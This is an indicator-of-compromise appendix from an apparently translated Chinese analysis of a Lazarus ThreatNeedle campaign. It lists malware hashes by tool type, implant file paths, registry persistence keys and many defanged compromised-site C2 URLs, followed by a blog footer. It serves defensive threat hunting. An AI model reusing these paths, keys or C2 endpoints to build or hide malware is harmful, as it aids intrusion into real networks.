16824dfd4a380699f3841a6fa7e52c6d aa74ed16b0057b31c835a5ef8a105942 85621411e4c80897c588b5df53d26270 %SYSTEMROOT%\system\avimovie.dll a611d023dfdd7ca1fab07f976d2b6629 160d0e396bf8ec87930a5df46469a960 %WINDIR%\winhelp.dll 110e1c46fd9a39a1c86292487994e5bd下載器
ac86d95e959452d189e30fa6ded05069 %APPDATA%\Microsoft\thumbnails.db木馬VNC上傳器
bea90d0ef40a657cb291d25c4573768d %ALLUSERSPROFILE%\adobe\arm86.dat 254a7a0c1db2bea788ca826f4b5bf51a %APPDATA%\PBL\user.tmp, %APPDATA%\Comms\Comms.dat隧道工具
6f0c7cbd57439e391c93a2101f958ccd %APPDATA\PBL\update.tmp fc9e7dc13ce7edc590ef7dfce12fe017LPE客戶端
0aceeb2d38fe8b5ef2899dd6b80bfc08 %TEMP%\ETS5659.tmp 09580ea6f1fe941f1984b4e1e442e0a5 %TEMP%\ETS4658.tmp文件路徑
%SYSTEMROOT%\system32\bcdbootinfo.tlp %SYSTEMROOT%\system32\Nwsapagent.sys %SYSTEMROOT%\system32\SRService.sys %SYSTEMROOT%\system32\NWCWorkstation.sys %SYSTEMROOT%\system32\WmdmPmSp.sys %SYSTEMROOT%\system32\PCAudit.sys %SYSTEMROOT%\system32\helpsvc.sys注冊表路徑
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig – Description HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig – SubVersion域和IP
hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php hxxp://www.au-pair[.]org/admin/Newspaper[.]asp hxxp://www.au-pair[.]org/admin/login[.]asp hxxp://www.colasprint[.]com/_vti_log/upload[.]asp hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp hxxp://www.sanatoliacare[.]com/include/index[.]asp hxxps://americanhotboats[.]com/forums/core/cache/index[.]php hxxps://docentfx[.]com/wp-admin/includes/upload[.]php hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp hxxps://www.curiofirenze[.]com/include/inc-site[.]asp hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php hxxps://www.dronerc[.]it/forum/uploads/index[.]php hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php hxxps://www.edujikim[.]com/intro/blue/view[.]asp hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp hxxps://www.fabioluciani[.]com/es/include/include[.]asp hxxp://www.juvillage.co[.]kr/img/upload[.]asp hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp hxxps://www.lyzeum[.]com/images/board/upload[.]asp hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php hxxps://www.polyboatowners[.]com/css/index[.]php hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php hxxp://156.245.16[.]55/admin/admin[.]asp hxxp://fredrikarnell[.]com/marocko2014/index[.]php hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp第二階段C2地址
hxxps://www.waterdoblog[.]com/uploads/index[.]asp hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]aspC2 URL用于提取特洛伊木馬VNC上傳器使用的文件
hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php hxxps://mdim.in[.]ua:443/core/cache/index[.]php hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp hxxps://www.dellarocca[.]net/it/content/img/img[.]asp hxxps://www.astedams[.]it/photos/image/image[.]asp hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp附錄II MITER ATT&CK映射
總結(jié)
以上是生活随笔為你收集整理的[译] APT分析报告:10.Lazarus以ThreatNeedle家族攻击工业事件还原(BMP图片隐藏RAT)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [译] APT分析报告:09.伊朗APT
- 下一篇: [译] APT分析报告:11.深入了解Z